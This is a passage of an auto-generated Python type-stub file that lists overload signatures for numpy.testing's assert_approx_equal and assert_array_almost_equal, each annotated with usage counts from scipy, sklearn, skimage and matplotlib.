actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.150000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.175000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.200000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.450000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.500000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.550000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.600000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.650000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.850000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.875000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.900000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.925000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.950000"],
):
"""
usage.scipy: 2
"""
...
# Catch-all signature for all recorded overloads above.
# Completed to the full documented numpy.testing.assert_approx_equal API --
# (actual, desired, significant=7, err_msg='', verbose=True) -- by adding the
# trailing defaulted `verbose` parameter; backward-compatible with every
# recorded call shape above.
def assert_approx_equal(
    actual: Union[numpy.float64, float],
    desired: Union[numpy.float64, int, float],
    significant: int = ...,
    err_msg: str = ...,
    verbose: bool = ...,
):
    """
    usage.matplotlib: 1
    usage.scipy: 220
    usage.sklearn: 2
    """
    ...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Tuple[int, int, int]]]):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.matplotlib: 29
usage.scipy: 1966
usage.skimage: 39
usage.sklearn: 886
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: Tuple[int, int, int]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int]):
"""
usage.matplotlib: 2
usage.scipy: 188
usage.skimage: 6
usage.sklearn: 61
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, float]]):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.skimage: 3
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[float]):
"""
usage.scipy: 105
usage.skimage: 1
usage.sklearn: 67
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Tuple[int, int]]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int], y: Tuple[int, int, int, int]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: Tuple[int, int, int, int, int, int]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: int):
"""
usage.scipy: 2
usage.skimage: 1
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64], y: Tuple[float, float, float]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: int):
"""
usage.scipy: 50
usage.skimage: 5
usage.sklearn: 14
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, decimal: int):
"""
usage.matplotlib: 4
usage.scipy: 249
usage.sklearn: 226
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=1"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=51"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=111"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=100"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=200"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=64"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=128"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=256"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["size=1024"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 2 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 3 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 4 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 8 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 12 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 15 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 16 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 17 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 32 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: Literal["Size 64 failed"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 128 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 256 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 512 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["Size 1024 failed"],
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[List[int], List[int]]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[int]]):
"""
usage.scipy: 298
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[List[int]]]):
"""
usage.scipy: 20
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["linear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["linear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["slinear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["slinear"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["quadratic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["quadratic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["nearest"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["nearest"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["zero"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["zero"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["previous"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["previous"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["next"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[int, int, int, int, int, int], y: List[int], err_msg: Literal["next"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: float):
"""
usage.scipy: 21
usage.sklearn: 15
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[float, complex]]):
"""
usage.scipy: 7
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.ndarray], y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.float64):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 8
usage.sklearn: 5
"""
...
@overload
def assert_array_almost_equal(
x: numpy.matrix, y: numpy.matrix, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[float, int]]], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[int, float]]], y: numpy.ndarray):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[int, complex]]], y: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix):
"""
usage.scipy: 93
"""
...
@overload
def assert_array_almost_equal(x: List[List[Union[float, int]]], y: numpy.matrix):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: List[List[Union[int, float, complex]]], y: numpy.matrix
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[int]], y: numpy.matrix):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, complex]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[complex, int]]]):
"""
usage.scipy: 10
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[complex, int]]):
"""
usage.scipy: 12
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[float, int]]):
"""
usage.scipy: 1
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[complex, int, float]]]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[int, complex]]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[complex]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[complex]]):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[numpy.float64, int]]):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[numpy.complex128, int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[List[float]], y: numpy.ndarray, decimal: int):
"""
usage.scipy: 10
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[float, int]]], decimal: int
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.ndarray):
"""
usage.scipy: 6
usage.sklearn: 5
"""
...
@overload
def assert_array_almost_equal(
x: List[Tuple[numpy.int64, numpy.int64]], y: List[Tuple[numpy.int64, numpy.int64]]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: List[float]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: List[int]):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: List[Tuple[numpy.float64, numpy.float64]], y: List[Tuple[float, float]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[int], y: numpy.ndarray):
"""
usage.scipy: 24
"""
...
@overload
def assert_array_almost_equal(x: list, y: numpy.ndarray):
"""
usage.scipy: 7
"""
...
@overload
def assert_array_almost_equal(x: List[list], y: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[List[int]], y: numpy.ndarray):
"""
usage.scipy: 173
"""
...
@overload
def assert_array_almost_equal(x: List[List[List[int]]], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[float], decimal: int):
"""
usage.matplotlib: 4
usage.scipy: 37
usage.sklearn: 61
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int], decimal: int):
"""
usage.scipy: 35
usage.sklearn: 12
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[float, int, float], decimal: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[float]], decimal: int):
"""
usage.scipy: 5
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.float64, decimal: int):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: int):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: int):
"""
usage.scipy: 12
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(x: bool, y: bool):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.bool_, y: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[float], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: List[complex], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: float):
"""
usage.matplotlib: 4
usage.scipy: 8
usage.sklearn: 7
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[int, float]]], decimal: int
):
"""
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 4
usage.sklearn: 8
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[complex, int]], err_msg: str
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[complex, numpy.float64, int]], err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[numpy.float64, complex, int]], err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[float, int]], decimal: int
):
"""
usage.scipy: 10
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[Union[int, float]], y: numpy.ndarray, decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.ndarray, decimal: int):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: float, y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: float, y: float):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[Union[int, numpy.float64]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[int, float]], decimal: int
):
"""
usage.scipy: 1
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.float64]):
"""
usage.scipy: 7
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: int, decimal: int):
"""
usage.scipy: 4
usage.sklearn: 17
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex64, y: numpy.complex128, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.complex128, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex256, y: numpy.complex256, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.float64):
"""
usage.matplotlib: 1
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.matrix):
"""
usage.scipy: 12
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[Union[int, float]]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint64, y: numpy.uint64):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.int64, y: numpy.int64):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.complex128):
"""
usage.scipy: 9
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.float64):
"""
usage.matplotlib: 3
usage.scipy: 9
usage.sklearn: 25
"""
...
@overload
def assert_array_almost_equal(x: numpy.ulonglong, y: numpy.uint64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.longlong, y: numpy.int64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex64, y: numpy.complex64):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float32):
"""
usage.scipy: 6
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex256, y: numpy.complex256):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.float128, y: numpy.float128):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint8, y: numpy.uint8):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int8, y: numpy.int8):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint32, y: numpy.uint32):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int32, y: numpy.int32):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ulonglong, y: numpy.ulonglong):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.longlong, y: numpy.longlong):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.uint16, y: numpy.uint16):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.int16, y: numpy.int16):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.bool_, y: numpy.bool_):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.matrix, y: numpy.matrix, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.matrix, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[float]]):
"""
usage.scipy: 2
usage.sklearn: 16
"""
...
@overload
def assert_array_almost_equal(x: Tuple[numpy.float64, numpy.float64], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: numpy.ndarray,
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: List[numpy.float64],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.sklearn: 13
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128],
y: Tuple[numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: List[Union[float, numpy.float64]],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: float, decimal: int):
"""
usage.scipy: 2
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray],
decimal: int,
):
"""
usage.scipy: 9
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: numpy.ndarray, decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[numpy.ndarray, numpy.ndarray], decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.complex128, y: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.float64], decimal: int):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[numpy.float64],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[float]):
"""
usage.scipy: 3
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[Union[float, numpy.float64]],
decimal: int,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[Union[float, int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: List[numpy.float64]):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[float, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[float], y: numpy.ndarray, decimal: int):
"""
usage.matplotlib: 1
usage.scipy: 8
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.morestats.FlignerResult, y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.scipy: 1
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.float64], y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: numpy.ndarray, decimal: int):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats._stats_mstats_common.LinregressResult,
y: Tuple[float, float, float, float, float],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[List[Union[numpy.float64, float]]]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_1sampResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.FriedmanchisquareResult, y: Tuple[float, float]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.FriedmanchisquareResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: scipy.stats.stats.KstestResult, decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: Tuple[float, float]):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.ndarray], y: Tuple[List[float], List[float]]
):
"""
usage.scipy: 6
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_relResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: List[numpy.float64]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: List[numpy.ndarray]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.Ttest_indResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.Ttest_indResult, y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(x: float, y: float, decimal: int):
"""
usage.scipy: 4
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: float, decimal: int):
"""
usage.scipy: 1
usage.sklearn: 25
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.NormaltestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.SkewtestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
